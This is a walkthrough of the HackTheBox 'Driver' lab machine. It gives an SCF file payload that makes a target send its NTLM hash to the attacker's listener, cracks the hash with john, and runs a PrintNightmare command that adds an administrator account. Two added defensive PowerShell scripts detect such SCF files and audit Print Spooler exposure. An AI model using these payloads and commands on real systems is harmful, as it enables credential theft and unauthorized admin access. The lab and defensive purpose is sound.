Where Notes Work
DRIVER – HACKTHEBOX
This is a write-up/walkthrough of the Driver machine from HackTheBox.
nmap scan:
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Visiting port 80 prompts for a username and password; admin:admin works. Behind it is a printer firmware update portal that lets us upload firmware files. Looking for a way to abuse the upload, I found an article about SCF file attacks.
Start Responder on Linux:
sudo responder -I tun0
Then take the SCF payload from that article and point the IconFile at your tunnel IP:
[Shell]
Command=2
IconFile=\\YOUR-TUNNEL-IP\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
Then upload the file (saved as okay.scf) to the portal, select any user, and submit it. Shortly afterwards Responder captured the NTLM hash of the user tony.
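From the defender's side, the tell-tale of this technique is an SCF file whose [Shell] IconFile points at a UNC path on a host that is not a known file server. The following is an added example, not code from the original write-up: a small PowerShell triage that parses SCF content and sweeps a share or upload directory for such files. The function names, parameter names and the constructed sample (with a placeholder IP) are my own assumptions.

```powershell
# Added example, not part of the original write-up: triage scan for SCF files whose
# [Shell] IconFile points at a remote UNC path, the shape of the payload above.
# Function names, parameter names and the sample content are my own assumptions.

function Get-ScfRemoteIcon {
    param(
        # File content, one element per line (as returned by Get-Content).
        [Parameter(Mandatory)][AllowEmptyString()][string[]]$Lines
    )
    # SCF is INI-style: only IconFile under [Shell] matters for this check.
    $section = ''
    foreach ($raw in $Lines) {
        $line = $raw.Trim()
        if ($line -match '^\[(.+)\]$') { $section = $Matches[1]; continue }
        if ($section -eq 'Shell' -and $line -match '^IconFile\s*=\s*(.+)$') {
            $icon = $Matches[1].Trim()
            # A \\host\share\... icon path makes Explorer authenticate to that host
            # when the folder is merely displayed, which is what Responder captures.
            if ($icon -match '^\\\\[^\\]+\\') { return $icon }
        }
    }
    return $null
}

function Find-SuspiciousScf {
    param([Parameter(Mandatory)][string]$Path)   # share or upload directory to scan
    Get-ChildItem -Path $Path -Recurse -File -Filter '*.scf' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $icon = Get-ScfRemoteIcon -Lines (Get-Content -LiteralPath $_.FullName)
            if ($icon) { [pscustomobject]@{ File = $_.FullName; RemoteIcon = $icon } }
        }
}

# Constructed sample in the same shape as the payload above (the IP is a placeholder).
$sample = @'
[Shell]
Command=2
IconFile=\\203.0.113.10\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
'@ -split "`r?`n"
Get-ScfRemoteIcon -Lines $sample

# Against a real share: Find-SuspiciousScf -Path '\\fileserver\uploads'
```

Get-ScfRemoteIcon returns the UNC icon path when it finds one and $null otherwise, so it drops straight into a scheduled sweep or an upload handler; an upload portal that accepts arbitrary files, as this one does, should at minimum reject .scf, .url and .lnk uploads rather than rely on a scan after the fact.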
I cracked the hash with john, then connected as tony with evil-winrm and got the user flag.
In tony's user directory I found the PowerShell console history. It contained a command that added a printer with a specific driver name; searching for that name turned up an exploit, and with it the privilege escalation vector.
I first tried the Metasploit module, but it failed with “[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target driver”, with both x64 and x86 payloads, so I think the error was on the Metasploit side. Since this machine is clearly set up for printing, I checked the running processes and found spoolsv running as well. I already knew an exploit that abuses the print spooler (PrintNightmare); I tried it, it worked, and I got Administrator.
Link to exploit: https://github.com/JohnHammond/CVE-2021-34527
Script loading is blocked by the execution policy, so bypass it for the current process in PowerShell:
Get-ExecutionPolicy
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
# Load the script
. .\CVE-2021-34527.ps1
Then use the exploit to add a new user directly to the Administrators group:
Invoke-Nightmare -NewUser "procoder" -NewPassword "Procoder@123" -DriverName "PrintMe"
Finally, log in with evil-winrm as procoder, which is now a member of the Administrators group.
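What made this step possible is a running Print Spooler combined with Point and Print settings that let a non-admin install a printer driver. The following is an added example, not code from the original write-up or the exploit repository: a PowerShell audit of the spooler service and of the Point and Print policy values that Microsoft documents for CVE-2021-34527. The function names and output layout are my own; the registry key and value names are Microsoft's.

```powershell
# Added example, not part of the original write-up: audits the Print Spooler state and
# the Point and Print policy values Microsoft documents for CVE-2021-34527, i.e. the
# conditions under which a standard user can install a printer driver as above.
# Function names and the output layout are my own assumptions.

$PointAndPrintKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Get-PointAndPrintValue {
    param([Parameter(Mandatory)][string]$Name)
    # Returns $null when the key or the value is absent ("not set").
    try { (Get-ItemProperty -Path $PointAndPrintKey -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Get-SpoolerExposure {
    $svc      = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $status   = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
    $restrict = Get-PointAndPrintValue 'RestrictDriverInstallationToAdministrators'
    $noWarn   = Get-PointAndPrintValue 'NoWarningNoElevationOnInstall'
    $update   = Get-PointAndPrintValue 'UpdatePromptSettings'

    $findings = @()
    if ($status -eq 'Running') {
        $findings += 'Print Spooler is running; disable it on hosts that do not need to print'
    }
    # Since the August 2021 update the default is 1 when the value is absent;
    # an explicit 0 allows standard users to install drivers again.
    if ($restrict -eq 0) {
        $findings += 'RestrictDriverInstallationToAdministrators is 0 (non-admin driver installs allowed)'
    }
    # Both of these should be 0 or absent; other values remove the warning/elevation prompts.
    if ($noWarn -eq 1) {
        $findings += 'NoWarningNoElevationOnInstall is 1 (no warning or elevation prompt on install)'
    }
    if ($null -ne $update -and $update -ne 0) {
        $findings += "UpdatePromptSettings is $update (prompts on driver update reduced or removed)"
    }

    [pscustomobject]@{
        SpoolerStatus        = $status
        RestrictToAdmins     = $restrict
        NoWarningNoElevation = $noWarn
        UpdatePromptSettings = $update
        Findings             = $findings
    }
}

Get-SpoolerExposure | Format-List
```

Run it from an elevated or a standard PowerShell session; both the service query and the policy key are readable without admin rights. An empty Findings list with the spooler stopped, or with RestrictDriverInstallationToAdministrators absent or 1 and the two prompt values absent or 0, is the patched-and-hardened state; on a host that genuinely needs the spooler, the registry values are the part you can enforce by Group Policy.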
Let me know in the comment section if you face any problem.